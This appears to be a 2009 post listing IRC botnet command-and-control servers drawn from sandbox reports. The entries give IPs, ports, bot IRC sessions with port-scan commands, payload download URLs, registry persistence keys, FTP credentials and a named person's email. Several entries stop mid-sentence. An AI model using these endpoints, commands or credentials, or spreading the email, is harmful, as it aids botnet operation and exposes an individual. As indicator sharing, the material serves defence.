Month: December 2009

snipa.gov (big net)

Remote Host       Port Number
174.133.63.91     51987

NICK pLagUe{USA}56265
MODE pLagUe{USA}56265 -ix
JOIN #H1N1
PRIVMSG #H1N1 :
USER pLagUe * ok
TeaM UniX b0at 0.4
PC has been ~iNfEctEd~

Other details

* The following port was open in the system:

Port    Protocol    Process
1051    TCP         raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications

* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + raidhost = “raidhost.exe”
    so that

64.89.27.36 (6k net)

Remote Host       Port Number
64.89.27.36       51987

NICK pLagUe{USA}{LAN}27954
MODE pLagUe{USA}{LAN}27954 -ix
JOIN #trees
PRIVMSG #trees :
PONG irc.lulz.ee
USER pLagUe * ok
TeaM UniX b0at 0.4
New Infection – Morpheous Stub

Other details

* The following port was open in the system:

Port    Protocol    Process
1050    TCP         raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications

* The newly created

69.16.172.40

Remote Host       Port Number
69.16.172.40      7000

NICK marthan
USER roland “” “69.16.172.40” :kendrick
PONG :2613115303
PONG :1661756035
PONG :1971802411

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cha
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chat
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\DefaultIcon
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\command
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec\Application
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec\ifexec
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec\Topic
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\DefaultIcon
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\Shell
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\Shell\open
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\Shell\open\command

hot.jatajoo.ru

Remote Host         Port Number
174.133.222.172     445
195.190.13.188      7272
222.231.29.29       7272
89.149.244.22       80

* The data identified by the following URL was then requested from the remote web server:
  o http://hot.jatajoo.ru/hot.php

NICK [N00_USA_XP_5605087]
USER SP2-366 * 0 :COMPUTERNAME
JOIN #nit open
PRIVMSG #modes2 :HTTP SET http://rapidshare.com/files/315648191/rost
PRIVMSG #nit :scan// Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes

baca.no-ip.org

Name / Query Type / Query Result / Successful / Protocol
baca.no-ip.org / DNS_TYPE_A / 94.23.234.102 / 1

94.23.234.102:9876

Nick: :{00-AUT-XP-pc8-4662}
Username: blaze
Server Pass: uline131.
Joined Channel: #uline
Channel Topic for Channel #uline: “!scan 90 1 85.x.x.x 3 1 85.x.x.x 3 16kkj”
Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x80xf6’xa0xf8’xb4x84@: “SC// Sequential Port Scan started on 1:90 with a delay of 60 seconds for 3 minutes using 1 threads.”

fatalz.net

Remote Host        Port Number
200.74.240.149     80
94.23.121.227      7000

* The data identified by the following URL was then requested from the remote web server:
  o http://facebook.freephphosting.biz/illusion/?act=online&s4=25580&s5=0&nickname=Q29tcHV0ZXJOYW1lWzExNDcwM10=

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ConsoleNameSpace
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NTNDIS
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NTNDIS\0000
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ntndis
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ntndis\Security
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ConsoleNameSpace]
    +

Server : FederalBereauofInvestigation [1.2.1546]

Remote Host        Port Number
72.184.197.176     6667

NICK XP|00|USA|SP2|7921
USER aqxt 0 0 :XP|00|USA|SP2|7921
USERHOST XP|00|USA|SP2|7921
MODE XP|00|USA|SP2|7921 +x+iB
JOIN #ecko
PONG :FederalBereauofInvestigation

Other details

* The following ports were open in the system:

Port    Protocol    Process
113     TCP         msconfig.exe (%System%\msconfig.exe)
1052    TCP         msconfig.exe (%System%\msconfig.exe)

Registry Modifications

* The following Registry Keys were created:
  o [pathname with a string SHARE]\MSConfig
  o [pathname with a

buli.burimche.net (50k bots)

buli.burimche.net:4244
channel: ##bb##

email from this guy in case u want to ask him about his bots lol
burimi@nerashti.com

Resolved : [nerashti.com] To [68.180.151.76]

DarkSons.Virus.Gov

Remote Host        Port Number
193.242.108.49     80
216.45.58.150      80
64.120.11.167      5900

* The data identified by the following URLs was then requested from the remote web server:
  o http://193.242.108.49/Dialer_Min/number.asp
  o http://www.sitepalace.com/w0rmreaper/NoVaC.jpeg

NICK VirUs-jbqiiweh
USER VirUs “” “bud” :8Coded8VirUs..
JOIN #THeRaNdOm1# Virus
PRIVMSG #THeRaNdOm1# :Success.
PONG :DarkSons.Virus.Gov
PASS Virus

Registry Modifications

* The following Registry Key was created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67KLN5J0-4OPM-61WE-KKX2-457QWE23218}
* The

armageddoncheats.net

Remote Host     Port Number
213.5.65.29     21
213.5.65.29     35989
213.5.65.29     80

FTP connections:
USER cmin04@armageddoncheats.net
USER rmin01@armageddoncheats.net
passwd:123456

* The data identified by the following URLs was then requested from the remote web server:
  o http://armageddoncheats.net/1.php?p1=COMPUTERNAME_HXOR
  o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=.
  o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=..
  o http://armageddoncheats.net/3.php?p1=COMPUTERNAME_HXOR

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IBUFFER
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IBUFFER\0000
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IBUFFER\0000\Control
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\IBuffer
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\IBuffer\Security